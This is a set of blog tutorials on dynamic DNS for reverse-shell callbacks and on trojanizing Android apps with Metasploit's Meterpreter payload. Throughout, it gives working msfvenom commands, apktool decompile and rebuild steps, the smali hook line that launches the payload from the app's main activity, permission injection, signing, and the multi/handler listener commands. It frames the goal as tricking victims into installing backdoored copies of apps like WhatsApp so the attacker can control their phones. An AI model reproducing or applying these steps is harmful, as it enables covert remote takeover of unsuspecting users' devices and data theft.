We all know what DNS or Domain Naming System is, it’s the system which binds an IP to a domain name. When you try to connect to a domain name, for example opening www.google.com on a  browser, the request first goes to a DNS server, which resolves the domain name into an IP, and then the browser gets the Google homepage from that IP. Similarly you can get a domain name for your machine and put that domain name in the place of HOST IP address in your payload. But the problem of your IP being dynamic still remains.

Here DDNS comes to the rescue. DDNS servers update the DNS record of your machine continuously, so that even for dynamic IP machines the domain name resolves to the correct IP, always.

Setting up DDNS using No-IP

There are many DDNS providers, I’m going to use No-IP which is one of them.

Step 1: Creating a No-IP account

Head to https://www.noip.com and create a free account there.

Step 2: Adding a Hostname in No-IP

When you get to the dashboard, go to Dynamic DNS -> Hostnames and add a hostname of your choice from there. You can also choose a domain name from a list there. The address you will get is hostname.domainname. Such as I chose the default domain name ddns.com and the hostname I entered is skulltech. So the address I got is ‘skulltech.ddns.com’. Refer to the screenshots below for reference.

step-1step-2

Step 3: Install the Dynamic DNS Update Client

Now you’ll need to install a program on your computer and set it up. So that it connects to No-IP server frequently and updates the DNS record. Download the update client from https://www.noip.com/download . It’s a tar.gz archive, extract it using the following command

tar -xzvf noip-duc-linux.tar.gz

screenshot-from-2016-12-18-14-24-36After that change working directory to the newly extracted folder and run the following command to install the No-IP client.

make install

screenshot-from-2016-12-18-14-38-06
After that the program will ask for your No-IP username and password.

Step 4: Configure the Client and Run It

Run the following command to launch the configuration wizard of the No-IP client. It will ask you for your credentials, as well as which hostnames you want to update. Select the hostname (or hostnames) that you want to associate with this computer in that step.

noip2 -C

When you are done with the configuration, just run noip2 in the terminal to start the client, it will run in the background and keep updating your DNS record.

noip2

screenshot-from-2016-12-18-14-49-56

Using DDNS hostname in Payloads

You can create a basic reverse shell payload for windows and get a shell on a remote computer on running it in that computer. Refer to this tutorial by Offensive Security for that, I won’t be going into details how to do that. Assuming that you already know how to create these payloads using msfvenom (if you don’t check out this tutorial), I’ll show you how you can use your DDNS hostname there.

Generally we run a command like this to generate the payload. Here LHOST is the address of the our local machine, in the following example it’s 192.168.1.101. 

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Now that we have a DDNS hostname, pass that as LHOST to msfvenom instead of your IP. So now the command will be

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=skulltech.ddn.com LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Feel free to leave a comment if you face any problem. Happy Hacking! 🙂

Embed a Metasploit Payload in an original .apk File | Part 2 – Do it manually

Metasploit’s flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system.

The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone?

One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original one, so the victim won’t even know that his system is compromised. That’s what we are going to do in this tutorial.

NOTE – This is a follow-up post of my previous post, in which I showed you how to do this using a very simple yet effective Ruby script. If you haven’t read it, check it out. If you are not willing to go down the hard path, you can use that method to do it just fine. But if you want to know the inner workings and have a greater knowledge, continue reading this post. And also, In the following Android Hacking tutorials, I may refer to this tutorial, so If you can take it, I suggest you to keep on reading.

PRE-REQUISTICS:

This tutorial is based on the Kali Linux Operating System. I’m sure it can be done in other OS, especially Linux Distros, but that will involve some more complications so I’m not going to cover those. If you are serious about Hacking [or Penetration Testing, if you prefer], you should use Kali as it was built specifically for Pen-Testing.

We will also need some libraries and tools in the following steps, so I think it’s better if you install them right now.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

Also download the apk which you want to be backdoor-ed from any source you like. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in the root folder.

BRIEF OVERVIEW:

Since this tutorial is a little bit long, I’m giving a brief overview of what we are going to do here.

  1. Generate the Meterpreter payload
  2. Decompile the payload and the original apk
  3. Copy the payload files to the original apk
  4. Inject the hook into the appropriate activity of the original apk
  5. Inject the permissions in the AndroidManifest.xml file
  6. Re-compile the original apk
  7. Sign the apk using Jarsigner

That’s about it. I will also show you how can you get a working Meterpreter session using that backdoored apk, if you don’t know that already. So let’s get started.

STEP 1: GENERATE THE PAYLOAD:

First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is-

msfvenom -p android/meterpreter/[Payload_Type] LHOST=[IP_Address] LPORT=[Incoming_Port] -o meterpreter.apk
      • Replace [Payload_Type] by any of the following payloads available. The function of all these payloads are same, essentially they are all Meterpreter payloads, the difference is only in the method they use to connect to your Kali system. The available [Payload_Type]s are –
        1. reverse_tcp
        2. reverse_http
        3. reverse_https

        You can use any one you like, I’m going to use reverse_https as an example.

      • Replace [IP_Address] by the IP address to which the payload is going to connect back to, i.e the IP address of the attacker’s system. If you are going to perform this attack over a local network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local IP will suffice. To know what your local IP is, run the command –
        ifconfig
        Screenshot from 2015-12-18 13:56:49

        If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google “My IP” and Google will help you out.

      • Replace [Incoming_Port] with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I’m going to use 4895 as an example.

So run the command using replacing the keywords with appropriate values and MSFVenom will generate a payload “meterpreter.apk” in the root directory. Note that we specified the output file name using the “-o meterpreter.apk” argument in the command, so if you like, you can name it anything else also.

Screenshot from 2015-12-18 14:23:14

STEP 2: DECOMPILE THE APKs:

Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/[Original_APK_Name]

It will decompile the payload to “/root/payload” and the original apk to “/root/original” directory.

Screenshot from 2015-12-19 01:30:26

 

STEP 3: COPY THE PAYLOAD FILES:

Now we have to copy the payload files to the original app’s folder. Just go to “/root/payload/smali/com/metasploit/stage” and copy all the .smali files whose file name contains the word ‘payload’. Now paste them in “/root/original/smali/com/metasploit/stage”. Note that this folder does not exists, so you have to create it.

STEP 4: INJECT THE HOOK IN THE ORIGINAL .SMALI CODE:

In the previous step, we just copied the payload codes inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn’t necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook in the original apk’s .smali code. If you are wondering what is this hook thingy I’m talking about, well essentially it’s a code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.

For this, firstly we have to find out which activity [to put it simply, activities are sections of code, it’s similar to frames in windows programming] is run when the app is launched. We can get this info from the AndroidManifest.xml file.

So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure [e.g. <tag attribute=”value”> Content </tag>]. Anyway, look for an <activity> tag which contains both the lines –

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value. In my case, as you can see from the screenshot below, it is “com.piriform.ccleaner.ui.activity.MainActivity”.

Screenshot from 2015-12-19 13:21:32

Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity [similar to the ‘main’ function in traditional programming].

Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –

gedit /root/original/smali/[Activity_Path]

Replace the [Activity_Path] with the activity’s “android:name”, but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the “android:name” is in, so we can easily get the location of the .smali code in the way we did. Check the screenshot below and you will get an idea of what I’m trying to say.

Screenshot from 2015-12-19 19:06:17

Now search for the following line in the smali code [using CTRL+F] –

;->onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is, inserting a code which starts the payload alongside the existing code which is executed when the activity starts. Now, save the edited smali file.

STEP 5: INJECT THE NECESSARY PERMISSIONS:

From developer.android.com –

Additional finer-grained security features are provided through a “permission” mechanism that enforces restrictions on the specific operations that a particular process can perform.

If we do not mention all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most of the users don’t care to read all those boring texts, so we do not have to worry about that much.

These permissions are also listed in the previously encountered AndroidManifest file. So let’s open the AndroidManifest.xml of both the original app and the payload from the respective folders. The permissions are mentioned inside <uses-permission> tag as an attribute ‘android:name’. Copy the additional permission lines from the Payload’s AndroidManifest to the original app’s one. But be careful that there should not be any duplicate.

Here’s my original app’s AndroidManifest before editing –Screenshot from 2015-12-19 19:37:12

After adding the additional ones from the Payload’s AndroidManifest, my /root/original/AndroidManifest.xml looks like this – Screenshot from 2015-12-19 19:42:48

STEP 6: RECOMPILE THE ORIGINAL APK:

Now th hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b /root/original

Screenshot from 2015-12-19 20:14:31

You will now have the compiled apk inside the “/root/original/dist” directory. But, we’re still not done yet.

STEP 7: SIGN THE APK:

This is also a very important step, as in most of the cases, an unsigned apk cannot be installed. From developer.android.com –

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

Be sure to replace the [apk_path] in the above command with the path to your backdoored apk file.

Screenshot from 2015-12-19 20:28:31

PROFIT?!:

Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!

Screenshot from 2015-12-19 20:44:01

Embed a Metasploit Payload in an Original .apk File | Part 1 – The Easy Way

Hi Fellas! I’m sure most of you, or at least those who have set a foot in the kingdom of hacking, have heard of Metasploit. Don’t be disappointed if you haven’t, because you’re in the right track.

From Wikipedia,

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

In a more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is,  it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload in the victims phone by any means [Usually involving Social Engineering], and when the victim runs the application, we would get a direct connection to that phone remotely and we can use it to wreak havoc on it.

But since the payload app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.

Here’s where this tutorial comes in. I’m gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly as the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.

PRE-REQUISTICS:

Just to be clear,  In this tutorial the operating system used is Kali Linux, which is a de facto standard OS for Penetration Testing (Read, hacking). You should also install the latest version of ‘ApkTool’ and some libraries for the scripts to work properly.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

STEP 1:

First of all grab the original apk from any of the numerous websites available. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder, in this tutorial I will use the Root folder and a WhatApp.apk as example.

STEP 2:

Download the Ruby script from this link and save it in the same folder as that of the original apk.

STEP 3:

Open a terminal, and type the following command:

ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895

In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.

NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You also may need to forward the port you’re using for this attack to work properly.

Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.

Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and from there, note the name of that Activity.

At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.

This is the hardest step of all, so I’m posting some screenshots to make your life easier.

Screenshot from 2015-12-12 01-44-01Screenshot from 2015-12-12 01-43-27

PROFIT?!:

If you did everything correctly, you should now get a apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run just like the original app.

As for the listener, you should use multi/handler and set the corresponding options accordingly. Just run the following commands.

msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Now wait for the victim to run the app, when he does it, you will get a Meterpreter prompt in the terminal!

Screenshot from 2015-12-18 14:32:55

NOTE:

You must have noticed I haven’t explained anything, rather asked you to blindly follow. As none of us wants to be a script-kiddie, we will learn how to do this manually in the next article. To be honest, I didn’t know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us set that story apart for another article.

If you face any problem, don’t forget to mention it in the comments. I’ll try to help you in any way I can.

CREDITS:

I found the script from the comments section of a thread in NullByte, so thanks to the guy who shared it, I’m sorry I don’t remember which thread it was or who the guy was. And credit of making this script goes to timwr and Jack64.